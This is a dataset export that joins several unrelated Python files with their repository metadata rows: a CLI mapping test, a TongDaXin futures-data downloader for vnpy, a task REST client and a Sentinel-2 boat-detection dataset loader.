image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5', '--coef', 'seasonality', '--amplitude',
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (1, 5, 5)
np.testing.assert_allclose(img[0, diag], coef_amp_b5)
# OLS REFIT RESULTS
def test_map_coef_pass_refit_OLS(example_results, tmpdir, read_image):
""" Make a map with refit OLS results
"""
image = tmpdir.join('ols_refitmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--refit_prefix', 'ols',
'--band', '5', '--coef', 'intercept',
'coef', '2005-06-01', image
]
)
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (1, 5, 5)
# INTENTIONAL FAILURES
def test_map_coef_fail_1(example_results, tmpdir, read_image):
""" Error because of non-existent --image (trigger click.BadParameter)
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', tmpdir.join('not_an_image.gtif').strpath,
'coef', '2005-06-01', image
])
assert result.exit_code == 2
assert 'Cannot find example image' in result.output
def test_map_coef_fail_2(example_results, tmpdir, read_image):
""" Error because of non-raster --image (trigger click.ClickException)
"""
image = tmpdir.join('coefmap.gtif').strpath
example = tmpdir.join('not_an_image.gtif').strpath
with open(example, 'w') as f:
f.write('some data')
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example,
'coef', '2005-06-01', image
])
assert result.exit_code == 1
assert 'Could not open example image' in result.output
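# The example_results and read_image fixtures used throughout come from the
# project's conftest.py, which is not shown here. A minimal sketch of a
# read_image fixture consistent with its use above (returning a
# (bands, rows, cols) array from a GeoTIFF); rasterio is an assumption for
# illustration, not necessarily what yatsm's test harness uses.
import pytest


@pytest.fixture
def read_image_sketch():
    def _read(path):
        import rasterio
        with rasterio.open(path) as src:
            return src.read()  # numpy array shaped (bands, rows, cols)
    return _read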
| 36.268657 | 79 | 0.614952 | 941 | 7,290 | 4.578108 | 0.18491 | 0.084494 | 0.048747 | 0.074745 | 0.670845 | 0.630455 | 0.621866 | 0.586119 | 0.574977 | 0.415042 | 0 | 0.081256 | 0.235254 | 7,290 | 200 | 80 | 36.45 | 0.69148 | 0.096296 | 0 | 0.522581 | 0 | 0 | 0.11992 | 0 | 0 | 0 | 0 | 0.005 | 0.187097 | 1 | 0.045161 | false | 0.032258 | 0.019355 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b825a315a2a75e94903d59de68c01ab589ab275 | 15,818 | py | Python | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | 1 | 2018-11-05T07:34:36.000Z | 2018-11-05T07:34:36.000Z | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | null | null | null | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | null | null | null | # encoding: UTF-8
# Download futures data from TDX (TongDaXin).
# Data fetched after the close is basically correct, but when pulling data live during trading hours:
# 1. The 1-min bar may not be the latest one; a few minutes can be missing.
# 2. For periods > 1 min, the last bar may be incomplete. After forcing a correction:
#    - 5-min: the corrected freq is basically right
#    - 1-day: VNPY does not care how many bars it has received when aggregating, so the impact is small
#    - other minute periods: hard to be exact per instrument, so the corrected freq may be wrong
from datetime import datetime, timezone, timedelta, time
import sys
import requests
import execjs
import traceback
from vnpy.trader.app.ctaStrategy.ctaBase import CtaBarData
from pytdx.exhq import TdxExHq_API
from pytdx.params import TDXParams
from vnpy.trader.vtFunction import getJsonPath
from vnpy.trader.vtGlobal import globalSetting
from vnpy.trader.vtObject import VtErrorData
import json
import pandas as pd
IP_LIST = [{'ip': '112.74.214.43', 'port': 7727},
{'ip': '59.175.238.38', 'port': 7727},
{'ip': '124.74.236.94', 'port': 7721},
{'ip': '218.80.248.229', 'port': 7721},
{'ip': '124.74.236.94', 'port': 7721},
{'ip': '58.246.109.27', 'port': 7721}
]
# TDX K-line (bar) types
# 0 - 5-minute bars
# 1 - 15-minute bars
# 2 - 30-minute bars
# 3 - 1-hour bars
# 4 - daily bars
# 5 - weekly bars
# 6 - monthly bars
# 7 - 1-minute
# 8 - 1-minute bars
# 9 - daily bars
# 10 - quarterly bars
# 11 - yearly bars
PERIOD_MAPPING = {}
PERIOD_MAPPING['1min'] = 8
PERIOD_MAPPING['5min'] = 0
PERIOD_MAPPING['15min'] = 1
PERIOD_MAPPING['30min'] = 2
PERIOD_MAPPING['1hour'] = 3
PERIOD_MAPPING['1day'] = 4
PERIOD_MAPPING['1week'] = 5
PERIOD_MAPPING['1month'] = 6
# Minutes per period (rough estimates; the night session and the 10:15 break are ignored)
NUM_MINUTE_MAPPING = {}
NUM_MINUTE_MAPPING['1min'] = 1
NUM_MINUTE_MAPPING['5min'] = 5
NUM_MINUTE_MAPPING['15min'] = 15
NUM_MINUTE_MAPPING['30min'] = 30
NUM_MINUTE_MAPPING['1hour'] = 60
NUM_MINUTE_MAPPING['1day'] = 60*24
NUM_MINUTE_MAPPING['1week'] = 60*24*7
NUM_MINUTE_MAPPING['1month'] = 60*24*7*30
# Constants
QSIZE = 500
ALL_MARKET_BEGIN_HOUR = 8
ALL_MARKET_END_HOUR = 16
class TdxFutureData(object):
api = None
    connection_status = False  # connection status
    symbol_exchange_dict = {}  # maps TDX contract -> VN exchange
    symbol_market_dict = {}  # maps TDX contract -> TDX market id
# ----------------------------------------------------------------------
def __init__(self, strategy):
"""
        Constructor.
        :param strategy: upper-level strategy, mainly used for strategy.writeCtaLog()
"""
self.strategy = strategy
self.connect()
def connect(self):
"""
        Connect to the API.
:return:
"""
        # Create the API connection object instance
        try:
            if self.api is None or not self.connection_status:
                self.strategy.writeCtaLog(u'Connecting to the TDX quote server')
                TdxFutureData.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
                # Pick the best server
                self.best_ip = self.select_best_ip()
                self.api.connect(self.best_ip['ip'], self.best_ip['port'])
                # Try to fetch the market contract count as a sanity check
                c = self.api.get_instrument_count()
                if c < 10:
                    err_msg = u'Server IP {}/{} is not responding'.format(self.best_ip['ip'], self.best_ip['port'])
                    self.strategy.writeCtaError(err_msg)
                else:
                    self.strategy.writeCtaLog(u'Created TDX connection, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
                    # print(u'Created TDX connection, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
                    TdxFutureData.connection_status = True
                    # Refresh symbol_exchange_dict and symbol_market_dict
                    self.qryInstrument()
        except Exception as ex:
            self.strategy.writeCtaLog(u'Exception while connecting to the TDX server: {},{}'.format(str(ex), traceback.format_exc()))
return
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
        Ping a quote server.
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = datetime.now() - __time1
                    self.strategy.writeCtaLog('Server {}:{}, latency: {}'.format(ip, port, _timestamp))
return _timestamp
else:
                    self.strategy.writeCtaLog(u'Server IP {} is not responding'.format(ip))
return timedelta(9, 9, 0)
except:
            self.strategy.writeCtaError(u'tdx ping: abnormal response from {}'.format(ip))
return timedelta(9, 9, 0)
# ----------------------------------------------------------------------
def select_best_ip(self):
"""
        Select the best quote server.
:return:
"""
        self.strategy.writeCtaLog(u'Selecting a TDX quote server')
data_future = [self.ping(x['ip'], x['port']) for x in IP_LIST]
best_future_ip = IP_LIST[data_future.index(min(data_future))]
        self.strategy.writeCtaLog(u'Selected {}:{}'.format(best_future_ip['ip'], best_future_ip['port']))
        # print(u'Selected {}:{}'.format(best_future_ip['ip'], best_future_ip['port']))
return best_future_ip
# ----------------------------------------------------------------------
def qryInstrument(self):
"""
        Query/refresh contract info.
:return:
"""
if not self.connection_status:
return
if self.api is None:
            self.strategy.writeCtaLog(u'No API connection available; failed to refresh contract info')
            # print(u'No API connection available; failed to refresh contract info')
return
        # Fetch all contract info
num = self.api.get_instrument_count()
if not isinstance(num,int):
return
all_contacts = sum([self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)],[])
#[{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]
        # Process all contracts, updating the index-contract -> TDX-market and index-contract -> exchange dicts
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None:
continue
tdx_market_id = tdx_contract.get('market')
            if tdx_market_id == 47:  # CFFEX (China Financial Futures Exchange)
                TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'CFFEX'})
                TdxFutureData.symbol_market_dict.update({tdx_symbol: tdx_market_id})
            elif tdx_market_id == 28:  # CZCE (Zhengzhou Commodity Exchange)
                TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'CZCE'})
                TdxFutureData.symbol_market_dict.update({tdx_symbol: tdx_market_id})
            elif tdx_market_id == 29:  # DCE (Dalian Commodity Exchange)
                TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'DCE'})
                TdxFutureData.symbol_market_dict.update({tdx_symbol: tdx_market_id})
            elif tdx_market_id == 30:  # SHFE + INE (Shanghai Futures Exchange + energy)
                TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'SHFE'})
                TdxFutureData.symbol_market_dict.update({tdx_symbol: tdx_market_id})
# ----------------------------------------------------------------------
def get_bars(self, symbol, period, callback, bar_is_completed=False, bar_freq=1, start_dt=None):
"""
        Return bar (K-line) data.
        symbol: contract symbol
        period: bar period: 1min, 3min, 5min, 15min, 30min, 1day, 3day, 1hour, 2hour, 4hour, 6hour, 12hour
"""
ret_bars = []
tdx_symbol = symbol.upper().replace('_' , '')
tdx_symbol = tdx_symbol.replace('99' , 'L9')
if tdx_symbol not in self.symbol_exchange_dict.keys():
            self.strategy.writeCtaError(u'{} contract {}/{} is not in the download list: {}'.format(datetime.now(), symbol, tdx_symbol, self.symbol_exchange_dict.keys()))
            # print(u'{} contract {}/{} is not in the download list: {}'.format(datetime.now(), symbol, tdx_symbol, self.symbol_exchange_dict.keys()))
            return False, ret_bars
        if period not in PERIOD_MAPPING.keys():
            self.strategy.writeCtaError(u'{} period {} is not in the download list: {}'.format(datetime.now(), period, list(PERIOD_MAPPING.keys())))
            # print(u'{} period {} is not in the download list: {}'.format(datetime.now(), period, list(PERIOD_MAPPING.keys())))
            return False, ret_bars
if self.api is None:
            return False, ret_bars
tdx_period = PERIOD_MAPPING.get(period)
if start_dt is None:
            self.strategy.writeCtaLog(u'No start time set; defaulting to 10 days ago')
qry_start_date = datetime.now() - timedelta(days=10)
else:
qry_start_date = start_dt
end_date = datetime.combine(datetime.now() + timedelta(days=1),time(ALL_MARKET_END_HOUR, 0))
if qry_start_date > end_date:
qry_start_date = end_date
        self.strategy.writeCtaLog('{} start downloading tdx: {} {} data, {} to {}.'.format(datetime.now(), tdx_symbol, tdx_period, qry_start_date, end_date))
        # print('{} start downloading tdx: {} {} data, {} to {}.'.format(datetime.now(), tdx_symbol, tdx_period, last_date, end_date))
try:
_start_date = end_date
_bars = []
_pos = 0
while _start_date > qry_start_date:
_res = self.api.get_instrument_bars(
PERIOD_MAPPING[period],
self.symbol_market_dict[tdx_symbol],
tdx_symbol,
_pos,
QSIZE)
if _res is not None:
_bars = _res + _bars
_pos += QSIZE
if _res is not None and len(_res) > 0:
_start_date = _res[0]['datetime']
_start_date = datetime.strptime(_start_date, '%Y-%m-%d %H:%M')
                    self.strategy.writeCtaLog(u'Chunked fetch, next start: {}'.format(_start_date))
else:
break
if len(_bars) == 0:
self.strategy.writeCtaError('{} Handling {}, len1={}..., continue'.format(
str(datetime.now()), tdx_symbol, len(_bars)))
return False, ret_bars
current_datetime = datetime.now()
data = self.api.to_df(_bars)
data = data.assign(datetime=pd.to_datetime(data['datetime']))
data = data.assign(ticker=symbol)
data['instrument_id'] = data['ticker']
# if future['market'] == 28 or future['market'] == 47:
            # #     uppercase tickers: CZCE commodities or CFFEX futures
# data['instrument_id'] = data['ticker']
# else:
# data['instrument_id'] = data['ticker'].apply(lambda x: x.lower())
data['symbol'] = symbol
data = data.drop(
['year', 'month', 'day', 'hour', 'minute', 'price', 'amount', 'ticker'],
errors='ignore',
axis=1)
data = data.rename(
index=str,
columns={
'position': 'open_interest',
'trade': 'volume',
})
if len(data) == 0:
print('{} Handling {}, len2={}..., continue'.format(
str(datetime.now()), tdx_symbol, len(data)))
return False, ret_bars
data['total_turnover'] = data['volume']
data["limit_down"] = 0
data["limit_up"] = 999999
data['trading_date'] = data['datetime']
data['trading_date'] = data['trading_date'].apply(lambda x: (x.strftime('%Y-%m-%d')))
            monday_ts = data['datetime'].dt.weekday == 0  # Monday
night_ts1 = data['datetime'].dt.hour > ALL_MARKET_END_HOUR
night_ts2 = data['datetime'].dt.hour < ALL_MARKET_BEGIN_HOUR
            data.loc[night_ts1, 'datetime'] -= timedelta(days=1)  # any date's night session (21:00-24:00): subtract one day
            monday_ts1 = monday_ts & night_ts1  # Monday night session (21:00-24:00): subtract two more days
            data.loc[monday_ts1, 'datetime'] -= timedelta(days=2)
            monday_ts2 = monday_ts & night_ts2  # Monday night session (00:00-04:00): subtract two more days
            data.loc[monday_ts2, 'datetime'] -= timedelta(days=2)
            # data['datetime'] -= timedelta(minutes=1)  # fed straight to the Strategy in RiceQuant format; no need to subtract 1 minute
data['dt_datetime'] = data['datetime']
data['date'] = data['datetime'].apply(lambda x: (x.strftime('%Y-%m-%d')))
data['time'] = data['datetime'].apply(lambda x: (x.strftime('%H:%M:%S')))
data['datetime'] = data['datetime'].apply(lambda x: float(x.strftime('%Y%m%d%H%M%S')))
data = data.set_index('dt_datetime', drop=False)
# data = data[int(last_date.strftime('%Y%m%d%H%M%S')):int(end_date.strftime('%Y%m%d%H%M%S'))]
# data = data[str(last_date):str(end_date)]
for index, row in data.iterrows():
add_bar = CtaBarData()
try:
add_bar.vtSymbol = row['symbol']
add_bar.symbol = row['symbol']
add_bar.datetime = index
add_bar.date = row['date']
add_bar.time = row['time']
add_bar.tradingDay = row['trading_date']
add_bar.open = float(row['open'])
add_bar.high = float(row['high'])
add_bar.low = float(row['low'])
add_bar.close = float(row['close'])
add_bar.volume = float(row['volume'])
except Exception as ex:
self.strategy.writeCtaError('error when convert bar:{},ex:{},t:{}'.format(row, str(ex), traceback.format_exc()))
# print('error when convert bar:{},ex:{},t:{}'.format(row, str(ex), traceback.format_exc()))
                    return False, ret_bars  # keep the (ok, bars) tuple contract consistent
if start_dt is not None and index < start_dt:
continue
ret_bars.append(add_bar)
if callback is not None:
freq = bar_freq
bar_is_completed = True
if period != '1min' and index == data['dt_datetime'][-1]:
                        # The last bar may be incomplete, so force a correction:
                        # - 5-min: the corrected freq is basically right
                        # - 1-day: VNPY does not care how many bars it has received when aggregating, so the impact is small
                        # - other minute periods: hard to be exact per instrument, so the corrected freq may be wrong
if index > current_datetime:
bar_is_completed = False
                            # counting by seconds needs +1; e.g. at 13:31, freq=31, i.e. the 31st bar
freq = NUM_MINUTE_MAPPING[period] - int((index - current_datetime).total_seconds() / 60)
callback(add_bar, bar_is_completed, freq)
return True,ret_bars
except Exception as ex:
self.strategy.writeCtaError('exception in get:{},{},{}'.format(tdx_symbol,str(ex), traceback.format_exc()))
# print('exception in get:{},{},{}'.format(tdx_symbol,str(ex), traceback.format_exc()))
            self.strategy.writeCtaLog(u'Resetting connection')
TdxFutureData.api = None
self.connect()
return False,ret_bars
if __name__ == "__main__":
class T(object):
def writeCtaError(self,content):
print(content,file=sys.stderr)
def writeCtaLog(self,content):
print(content)
def display_bar(self,bar, bar_is_completed=True, freq=1):
print(u'{} {}'.format(bar.vtSymbol,bar.datetime))
t1 = T()
t2 = T()
    # Create the API object
api_01 = TdxFutureData(t1)
    # Fetch historical minute bars
api_01.get_bars('rb1905', period='5min', callback=t1.display_bar)
# api.get_bars(symbol, period='5min', callback=display_bar)
# api_01.get_bars('IF99', period='1day', callback=t1.display_bar)
    # Test a single instance
# api_02 = TdxFutureData(t2)
#api_02.get_bars('IF99', period='1min', callback=t1.display_bar) | 41.408377 | 143 | 0.528954 | 1,752 | 15,818 | 4.577626 | 0.224886 | 0.026933 | 0.034414 | 0.029925 | 0.313591 | 0.245387 | 0.209975 | 0.158479 | 0.131047 | 0.121571 | 0 | 0.031958 | 0.319509 | 15,818 | 382 | 144 | 41.408377 | 0.713118 | 0.177456 | 0 | 0.142276 | 0 | 0 | 0.087785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0 | 0.052846 | 0 | 0.178862 | 0.01626 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b860fbcd0db0ce753a72fb029b2b9026ebfb76b | 1,515 | py | Python | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | null | null | null | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | null | null | null | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | 1 | 2022-02-19T11:26:30.000Z | 2022-02-19T11:26:30.000Z | import requests
base_url = 'http://localhost:5000/tasks'
def list_tasks():
r = requests.get(base_url)
return r.json()
def task(task_id):
url = base_url + '/' + str(task_id)
r = requests.get(url)
if r.status_code == 200:
return r.json()
else:
return None
def add_task(todo, urgent):
new_task = {"todo": todo,
"urgent": urgent}
r = requests.post(base_url, json=new_task)
if r.status_code == 201:
return r.json()
else:
return None
def update_task(task_id, todo, urgent):
upd_task = {"todo": todo,
"urgent": urgent}
url = base_url + '/' + str(task_id)
r = requests.put(url, json=upd_task)
if r.status_code == 200:
return r.json()
else:
return None
def delete_task(task_id):
r = requests.delete(base_url + '/' + str(task_id))
if r.status_code == 200:
return r.json()
else:
return None
if __name__ == '__main__':
print("Example of the full list got with GET")
print(list_tasks())
print("\nExamples of a single task got with GET")
print(task(1))
print(task(2))
print("\nExample of a single task created with POST")
print(add_task('buy eggs', 0))
print(list_tasks())
print("\nExample of a single task updated with PUT")
print(update_task(2, "buy a new mouse", 0))
print(list_tasks())
print("\nExample of a single task deleted with DELETE")
print(delete_task(3))
print(list_tasks())
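# A minimal sketch of the Flask server these requests expect, assuming the
# route shapes implied above (GET/POST /tasks, GET/PUT/DELETE /tasks/<id>).
# Kept as a string so this client module stays runnable; it is an illustration,
# not the actual lab server.
SERVER_SKETCH = '''
from flask import Flask, jsonify, request

app = Flask(__name__)
tasks = {1: {"id": 1, "todo": "buy milk", "urgent": 0}}

@app.route('/tasks', methods=['GET'])
def get_tasks():
    return jsonify(list(tasks.values()))

@app.route('/tasks', methods=['POST'])
def create_task():
    new_id = max(tasks, default=0) + 1
    tasks[new_id] = {"id": new_id, **request.get_json()}
    return jsonify(tasks[new_id]), 201

@app.route('/tasks/<int:task_id>', methods=['GET'])
def get_task(task_id):
    if task_id not in tasks:
        return jsonify({"error": "not found"}), 404
    return jsonify(tasks[task_id])

@app.route('/tasks/<int:task_id>', methods=['PUT'])
def update_task(task_id):
    if task_id not in tasks:
        return jsonify({"error": "not found"}), 404
    tasks[task_id].update(request.get_json())
    return jsonify(tasks[task_id])

@app.route('/tasks/<int:task_id>', methods=['DELETE'])
def delete_task(task_id):
    if task_id not in tasks:
        return jsonify({"error": "not found"}), 404
    return jsonify(tasks.pop(task_id))
'''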
| 22.279412 | 59 | 0.60132 | 220 | 1,515 | 3.963636 | 0.254545 | 0.048165 | 0.063073 | 0.059633 | 0.465596 | 0.368119 | 0.338303 | 0.306193 | 0.241972 | 0.241972 | 0 | 0.019802 | 0.266667 | 1,515 | 67 | 60 | 22.61194 | 0.765077 | 0 | 0 | 0.48 | 0 | 0 | 0.192079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.02 | 0 | 0.3 | 0.28 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8651b966dc2e3855a5c2959144ad8e960d0050 | 8,964 | py | Python | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | 6 | 2020-07-14T20:01:53.000Z | 2021-12-26T22:57:41.000Z | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | null | null | null | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | null | null | null | import os
import numpy as np
import pandas as pd
import warnings
import sys
import matplotlib.pyplot as plt
import plotly.express as px
from sklearn.model_selection import train_test_split
import skimage
from skimage.io import imread
import glob
from pathlib import Path
import torch
from torch.utils.data import Dataset
def plot_geoloc(train_coordinates, val_coordinates=None):
"""
Args:
train_coordinates: list of (lat,lon)
val_coordinates: list of (lat,lon)
Returns:
MapboxPlot of region
"""
if val_coordinates is not None:
df = pd.DataFrame(train_coordinates+val_coordinates, columns=['lat', 'lon'])
df.insert(2, "color", [0]*len(train_coordinates)+[1]*len(val_coordinates), True)
else:
df = pd.DataFrame(train_coordinates, columns=['lat', 'lon'])
df.insert(2, "color", [0]*len(train_coordinates), True)
mapbox_access_token = os.environ['mapbox_access_token'] # Mapbox access token
px.set_mapbox_access_token(mapbox_access_token)
if val_coordinates is not None:
fig = px.scatter_mapbox(df, lon="lon", lat="lat", color='color', zoom=2, color_continuous_scale=px.colors.sequential.Bluered, width=1024, height=768)
else:
fig = px.scatter_mapbox(df, lon="lon", lat="lat", color='color', zoom=2, color_continuous_scale=px.colors.sequential.Greens, width=1024, height=768)
return fig
def getImageSetDirectories(data_dir='data/chips', labels_filename='data/labels.csv', band_list=['img_ndwi'], test_size=0.1, plot_coords=True,
plot_class_imbalance=True, seed=123):
""" Return list of list of paths to filenames for training and validation (KFold)
Args:
data_dir: str, path to chips folder.
band_list: list of str, from img_ndwi, img_02, img_03, img_04, img_08 and optionally bg_ndwi, bg_02, bg_03, bg_04, bg_08.
test_size: float, proportion of locations for validation
plot_coords: bool, plot coordinates with mapbox
plot_class_imbalance: bool, plot target histograms (train, val labels)
Returns:
train_img_paths, val_img_paths: list of (list of list of str)
fig: mapbox plot of coordinates if plot_coords is True. Otherwise, returns None.
"""
df_labels = pd.read_csv(labels_filename, dtype={'count': float})
df_labels = df_labels[df_labels["count"] >= 0.0] # keep positive counts
df_labels_groupby = df_labels.groupby("lat_lon")
coordinates = np.array(list(df_labels_groupby.groups.keys()))
train_coordinates, val_coordinates = train_test_split(coordinates, test_size=test_size, random_state=seed, shuffle=True) # split train/val coordinates
def get_img_paths(coordinates):
img_paths = []
for subdir in coordinates:
timestamps = df_labels_groupby.get_group(name = subdir)["timestamp"] # if count is negative, will not appear in the group
for timestamp in timestamps:
img_timestamp = []
for band in band_list: # img_08, bg_ndwi, img_clp
if band.startswith('img_'):
img_timestamp.extend(glob.glob(os.path.join(data_dir, subdir, band + "*t_" + timestamp + "*.png")))
else:
img_timestamp.extend(glob.glob(os.path.join(data_dir, subdir, band + "*.png")))
                if len(img_timestamp) == len(band_list):  # sanity check (BUG for certain coords / chips)
img_paths.append(img_timestamp)
else:
print('Assertion error', len(img_timestamp),len(band_list),img_timestamp)
return np.array(img_paths)
train_img_paths = get_img_paths(train_coordinates) # get list of filenames
val_img_paths = get_img_paths(val_coordinates)
print("Found {0} coordinates ({1} chips): {2} train ({3} chips) / {4} val ({5} chips)".format(len(coordinates), len(train_img_paths)+len(val_img_paths), len(train_coordinates), len(train_img_paths), len(val_coordinates), len(val_img_paths)))
fig = None
if plot_coords is True:
train_coords = [coord.replace('lat_','').split('_lon_') for coord in train_coordinates]
train_coords = [ (float(coord[0].replace('_','.')), float(coord[1].replace('_','.'))) for coord in train_coords]
val_coords = [coord.replace('lat_','').split('_lon_') for coord in val_coordinates]
val_coords = [ (float(coord[0].replace('_','.')), float(coord[1].replace('_','.'))) for coord in val_coords]
fig = plot_geoloc(list(train_coords), list(val_coords))
if plot_class_imbalance is True:
if not sys.warnoptions:
warnings.simplefilter("ignore")
plt.figure(1, figsize=(20,5))
plt.subplot(131)
df_labels[df_labels['lat_lon'].isin(train_coordinates)]['count'].hist(color='blue')
plt.xlabel('label')
plt.ylabel('counts (train)')
plt.subplot(132)
df_labels[df_labels['lat_lon'].isin(val_coordinates)]['count'].hist(color='red')
plt.xlabel('label')
plt.ylabel('counts (val)')
plt.subplot(133)
n_chips_per_coords = [len([filename for filename in os.listdir(data_dir+'/'+coord) if filename.startswith('img_08')]) for coord in os.listdir(data_dir)]
n_chips_per_coords = [k for k in n_chips_per_coords if k>0]
plt.xlabel('# chips / coordinates')
        plt.ylabel('counts')
plt.hist(n_chips_per_coords, color='black')
plt.title('Mean: {:.2f} / Range: [{} {}]'.format(np.mean(n_chips_per_coords), np.min(n_chips_per_coords), np.max(n_chips_per_coords)))
plt.show()
return train_img_paths, val_img_paths, fig
class S2_Dataset(Dataset):
""" Derived Dataset class for loading imagery from an imset_dir."""
def __init__(self, imset_dir, augment=True, crop_size=2, labels_filename='data/labels.csv'):
super().__init__()
self.img_paths = imset_dir
self.augment = augment
self.crop_size = crop_size # if self.augment is True
self.df_labels = pd.read_csv(labels_filename)
def __len__(self):
return len(self.img_paths)
def __getitem__(self, index):
""" Returns an ImageSet for the given index (int)."""
if not isinstance(index, int):
raise KeyError('index must be int')
imset = {}
imset['img'] = np.stack([imread(filename) for filename in self.img_paths[index]],0)
filename = self.img_paths[index][0] # ex: /home/jovyan/data/chips/lat_43_09_lon_5_93/img_08_t_2020-02-17.png
imset['filename'] = filename
lat_lon = filename.split('/')[-2]
timestamp = filename.split('/')[-1].replace('.png','')[-10:]
index = (self.df_labels['lat_lon']==lat_lon) * (self.df_labels['timestamp']==timestamp)
imset['y'] = float(self.df_labels[index]['count'].values)
if self.augment is True:
h_flip, v_flip = np.random.rand(1)>0.5, np.random.rand(1)>0.5 # random flip
if v_flip:
imset['img'] = imset['img'][:,::-1]
if h_flip:
imset['img'] = imset['img'][:,:,::-1]
k = np.random.randint(4) # random rotate
imset['img'] = np.rot90(imset['img'], k=k, axes=(1,2))
crop_x = np.random.randint(0, self.crop_size)
crop_y = np.random.randint(0, self.crop_size)
imset['img'] = imset['img'][:, crop_x:-self.crop_size+crop_x, crop_y:-self.crop_size+crop_y]
imset['img'] = torch.from_numpy(skimage.img_as_float(imset['img']))
### Add grid as channel --> Warp image // Spatial Transform Networks
#H, W = 100, 100
#pool_size = 10
#grid = torch.zeros((pool_size,pool_size))
#grid[:1] += 1
#grid[-1:] += 1
#grid[1:-1,:1] += 1
#grid[1:-1,-1] += 1
#grid = torch.cat(H//pool_size*[grid],0)
#grid = torch.cat(W//pool_size*[grid],1)
#grid = grid.reshape(1,H,W)
#if self.augment is True:
# grid = grid[:, crop_x:-self.crop_size+crop_x, crop_y:-self.crop_size+crop_y]
#imset['img'] = torch.cat([imset['img'], grid.double()], 0)
###
imset['y'] = torch.from_numpy(np.array([imset['y']]))
return imset
def plot_dataset(dataset, n_frames=14, n_rows=2):
""" Plot dataset images. """
fig = plt.figure(figsize=(16,5))
for t in range(n_frames):
plt.subplot(n_rows,n_frames//n_rows,1+t)
imset = dataset[t]
x = imset['img']
y = int(imset['y'])
plt.imshow(x[0], cmap='coolwarm', vmin=0., vmax=0.4) # NIR band
#plt.imshow(np.stack([x[0]**0.5, 0.5*(x[1]+x[0]), 0.5*(1-x[1])],-1)) # composite color
plt.xticks([])
plt.yticks([])
plt.title('Label {}'.format(y))
fig.tight_layout()
plt.show()
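# A minimal end-to-end sketch of the intended wiring, assuming the default
# data/chips + data/labels.csv layout exists on disk; the band list, batch
# size and frame count below are illustrative choices, not project defaults.
if __name__ == "__main__":
    train_paths, val_paths, _ = getImageSetDirectories(
        band_list=['img_ndwi'], test_size=0.1,
        plot_coords=False, plot_class_imbalance=False)
    train_set = S2_Dataset(train_paths, augment=True)
    # default collate handles the dict of tensors/strings returned by __getitem__
    loader = torch.utils.data.DataLoader(train_set, batch_size=8, shuffle=True)
    plot_dataset(train_set, n_frames=4, n_rows=1)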
